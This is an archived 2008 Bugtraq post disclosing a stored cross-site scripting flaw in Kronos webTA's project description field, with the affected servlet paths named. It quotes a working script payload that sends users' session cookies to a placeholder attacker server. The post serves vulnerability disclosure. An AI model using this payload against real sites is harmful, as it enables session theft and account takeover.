lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CE446230FD6A66468C69A25C27ED35963F8147@flame.senet-int.com>
Date: Mon, 9 Jun 2008 11:48:57 -0400
From: "Alex Eden" <Alex.Eden@...et-int.com>
To: <bugtraq@...urityfocus.com>
Subject: webTA by kronos - XSS

http://www.kronos.com/Products/webTA.htm

webTA is used by thousands of fed. employees.

I did a limited security review of a couple deployments. Because of certain
contractual limitations I have been able to verify XSS in its Project
Management module only, but I suspect it also exists in Vacation/Sick Leave
Request module.

URLs: /servlet/com.threeis.webta.H710selProject and
/servlet/com.threeis.webta.H720editProjectInfo

Use these URLs to create project descriptions. No hex or html encoding or
anything fancy is necessary. Just type in the description field your favorite
XSS stuff - it will work. 

I tested basic font changing html tags (<font color="red">test for
XSS</font>), and JavaScript (<script>document.write('<img
src="http://ip_of_my_server_on_my_laptop/cookie.cgi?'+document.cookie+'">')</
script>). On my laptop I had Apache listening, and collecting user session
information into its logs.

Yeah, it is remote, in case you are wondering.

I no longer have the access to any webTA systems, and cannot verify anything
else. 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ